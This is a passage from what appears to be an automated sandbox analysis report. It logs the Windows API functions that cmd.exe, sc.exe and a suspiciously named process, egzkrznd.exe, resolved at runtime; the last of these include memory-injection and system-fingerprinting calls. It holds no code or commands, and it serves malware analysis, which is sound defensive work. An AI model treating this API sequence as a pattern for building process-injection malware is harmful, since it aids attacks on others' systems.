00000000-00004004)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00004004)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00004004)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00004004)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00004004)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00004004)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00004004)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00004004)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00004004)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00004004)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00004004)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00004004)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00004004)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00004004)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00004004)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00004004)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004000)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CopyFileExW (UID: 00000000-00004000)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter IsDebuggerPresent (UID: 00000000-00004000)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetConsoleInputExeNameW (UID: 00000000-00004000)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00004000)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetCharABCWidthsI (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSEnableIME (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSGetEnableStatus (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExW (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExA (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEW (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEA (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEW (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEA (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEW (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEA (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmAssociateContext (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmEscapeA (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmEscapeW (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringA (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringW (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionWindow (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetContext (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetDefaultIMEWnd (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIsIME (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmReleaseContext (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmRegisterClient (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontW (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontA (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontW (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontA (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionWindow (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmNotifyIME (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLockIMC (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmUnlockIMC (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLoadIME (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetOpenStatus (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmFreeLayout (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmActivateLayout (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCandidateWindow (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCandidateWindow (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmConfigureIMEW (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetConversionStatus (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetConversionStatus (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetStatusWindowPos (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetImeInfoEx (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLockImeDpi (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmUnlockImeDpi (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetOpenStatus (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetActiveContext (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmTranslateMessage (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLoadLayout (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmProcessKey (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmPutImeMenuItemsIntoMappedFile (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetProperty (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringA (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringW (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmEnumInputContext (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSystemHandler (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmTIMActivate (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmRestoreToolbarWnd (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmHideToolbarWnd (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmDispatchDefImeMessage (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmNotify (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmSetDefaultRemoteKeyboardLayout (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmGetCompatibleKeyboardLayout (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkTabbedTextOut (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkPSMTextOut (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkDrawTextEx (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetCharABCWidthsI (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSEnableIME (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSGetEnableStatus (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExW (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExA (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEW (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEA (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEW (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEA (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEW (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEA (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmAssociateContext (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmEscapeA (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmEscapeW (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringA (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringW (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionWindow (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetContext (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetDefaultIMEWnd (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIsIME (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmReleaseContext (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmRegisterClient (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontW (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontA (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontW (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontA (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionWindow (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmNotifyIME (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLockIMC (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmUnlockIMC (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLoadIME (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetOpenStatus (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmFreeLayout (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmActivateLayout (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCandidateWindow (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCandidateWindow (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmConfigureIMEW (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetConversionStatus (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetConversionStatus (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetStatusWindowPos (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetImeInfoEx (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLockImeDpi (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmUnlockImeDpi (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetOpenStatus (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetActiveContext (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmTranslateMessage (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLoadLayout (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmProcessKey (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmPutImeMenuItemsIntoMappedFile (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetProperty (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringA (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringW (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmEnumInputContext (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSystemHandler (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmTIMActivate (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmRestoreToolbarWnd (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmHideToolbarWnd (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmDispatchDefImeMessage (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmNotify (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmSetDefaultRemoteKeyboardLayout (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmGetCompatibleKeyboardLayout (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkTabbedTextOut (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkPSMTextOut (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkDrawTextEx (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00004236)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004152)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00004152)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter GlobalAlloc (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter GetLastError (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter Sleep (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter VirtualAlloc (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter CreateToolhelp32Snapshot (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter Module32First (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter CloseHandle (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter LoadLibraryA (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter VirtualProtect (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter VirtualFree (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter GetVersionExA (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter TerminateProcess (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter ExitProcess (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter SetErrorMode (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter StackWalk64 (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter GetVolumeInformationA (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter GetComputerNameA (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter GetTickCount (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcess (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleA (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter GetSystemInfo (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter lstrcmpiA (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter lstrlenA (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter lstrcpynA (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter InterlockedExchange (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter GetCurrentThreadId (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter GetOverlappedResult (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter WaitForSingleObject (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter WriteFile (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter ReadFile (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter CreateFileA (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter DisconnectNamedPipe (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter ConnectNamedPipe (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter CreateNamedPipeA (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter GetEnvironmentVariableA (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter DeleteFileA (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter IsBadWritePtr (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter IsBadCodePtr (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter lstrcpyA (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter lstrcmpA (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter IsBadReadPtr (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter WriteProcessMemory (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter VirtualAllocEx (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter SetFilePointer (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter GetFileSize (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter SetFileAttributesA (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter GetDiskFreeSpaceA (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter GetWindowsDirectoryA (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter GetProcAddress (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a 